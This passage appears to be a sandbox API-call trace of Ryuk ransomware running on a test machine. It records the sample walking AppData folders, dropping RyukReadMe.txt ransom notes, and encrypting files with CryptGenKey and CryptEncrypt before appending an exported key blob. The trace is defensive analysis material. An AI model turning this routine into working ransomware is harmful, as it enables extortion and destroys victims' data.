lpFindFileData=0x29aa420) returned 0x3a3000 [0141.200] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.200] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.200] SetLastError (dwErrCode=0x0) [0141.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0141.201] GetLastError () returned 0x0 [0141.201] WriteFile (in: hFile=0x1a0, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aa3d0*=0x320, lpOverlapped=0x0) returned 1 [0141.201] CloseHandle (hObject=0x1a0) returned 1 [0141.202] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*.*", lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0x3a3060 [0141.202] FindNextFileW (in: hFindFile=0x3a3060, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0141.202] FindNextFileW (in: hFindFile=0x3a3060, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0141.202] SetLastError (dwErrCode=0x0) [0141.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0141.203] GetLastError () returned 0x0 [0141.203] WriteFile (in: hFile=0x1a4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29a9c20, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29a9c20*=0x320, lpOverlapped=0x0) returned 1 [0141.203] CloseHandle (hObject=0x1a4) returned 1 [0141.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*.*", lpFindFileData=0x29a94c0 | out: lpFindFileData=0x29a94c0) returned 0x3a30c0 [0141.204] FindNextFileW (in: hFindFile=0x3a30c0, lpFindFileData=0x29a94c0 | out: lpFindFileData=0x29a94c0) returned 1 [0141.204] FindNextFileW (in: hFindFile=0x3a30c0, lpFindFileData=0x29a94c0 | out: lpFindFileData=0x29a94c0) returned 0 [0141.204] FindClose (in: hFindFile=0x3a30c0 | out: hFindFile=0x3a30c0) returned 1 [0141.204] SetLastError (dwErrCode=0x0) [0141.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0141.205] GetLastError () returned 0x0 [0141.205] WriteFile (in: hFile=0x1a4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29a9c20, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29a9c20*=0x320, lpOverlapped=0x0) returned 1 [0141.206] CloseHandle (hObject=0x1a4) returned 1 [0141.206] FindNextFileW (in: hFindFile=0x3a3060, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0 [0141.206] FindClose (in: hFindFile=0x3a3060 | out: hFindFile=0x3a3060) returned 1 [0141.206] SetLastError (dwErrCode=0x0) [0141.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0141.206] GetLastError () returned 0xb7 [0141.206] CloseHandle (hObject=0x1a0) returned 1 [0141.206] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0141.206] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0141.206] SetLastError (dwErrCode=0x0) [0141.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.207] GetLastError () returned 0xb7 [0141.207] CloseHandle (hObject=0x19c) returned 1 [0141.207] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.207] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.207] SetLastError (dwErrCode=0x0) [0141.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.207] GetLastError () returned 0xb7 [0141.207] CloseHandle (hObject=0x198) returned 1 [0141.207] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.207] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.207] SetLastError (dwErrCode=0x0) [0141.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.207] GetLastError () returned 0xb7 [0141.207] CloseHandle (hObject=0x194) returned 1 [0141.207] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.207] SetLastError (dwErrCode=0x0) [0141.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.207] GetLastError () returned 0xb7 [0141.207] CloseHandle (hObject=0x194) returned 1 [0141.208] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.208] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.208] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.208] SetLastError (dwErrCode=0x0) [0141.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.208] GetLastError () returned 0x0 [0141.208] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.209] CloseHandle (hObject=0x198) returned 1 [0141.209] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.211] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.211] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.211] SetLastError (dwErrCode=0x0) [0141.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.211] GetLastError () returned 0x0 [0141.211] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0141.212] CloseHandle (hObject=0x19c) returned 1 [0141.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0141.213] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.213] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.213] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0141.213] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0141.213] SetLastError (dwErrCode=0x0) [0141.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.215] GetLastError () returned 0x0 [0141.215] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0141.218] CloseHandle (hObject=0x19c) returned 1 [0141.219] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.219] SetLastError (dwErrCode=0x0) [0141.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.219] GetLastError () returned 0xb7 [0141.219] CloseHandle (hObject=0x19c) returned 1 [0141.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0141.221] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.221] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.221] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.221] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.221] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.221] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.221] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms", dwFileAttributes=0x80) returned 1 [0141.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0141.222] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=3808) returned 1 [0141.222] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=3808) returned 1 [0141.222] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xdbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.222] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0141.223] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.223] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0141.223] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.223] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.223] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0xee0, lpOverlapped=0x0) returned 1 [0141.223] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0141.223] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0xee0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0xef0) returned 1 [0141.224] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.224] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0xef0, lpOverlapped=0x0) returned 1 [0141.224] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0141.224] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.224] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.224] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0141.224] CloseHandle (hObject=0x1a0) returned 1 [0141.240] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.245] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.245] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.245] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.245] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.245] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", dwFileAttributes=0x80) returned 1 [0141.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0141.246] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1376) returned 1 [0141.246] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1376) returned 1 [0141.246] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x43e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.246] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0141.247] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.247] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0141.247] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.247] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.247] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x560, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x560, lpOverlapped=0x0) returned 1 [0141.247] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0141.247] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x560, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x570) returned 1 [0141.247] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.247] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x570, lpOverlapped=0x0) returned 1 [0141.248] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0141.248] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.248] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0141.248] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0141.248] CloseHandle (hObject=0x1a0) returned 1 [0141.264] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.268] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.268] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.268] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0141.268] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0141.269] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0141.269] SetLastError (dwErrCode=0x0) [0141.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.269] GetLastError () returned 0x0 [0141.269] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0141.270] CloseHandle (hObject=0x19c) returned 1 [0141.270] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.270] SetLastError (dwErrCode=0x0) [0141.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.271] GetLastError () returned 0xb7 [0141.271] CloseHandle (hObject=0x19c) returned 1 [0141.271] FindFirstFileW (in: 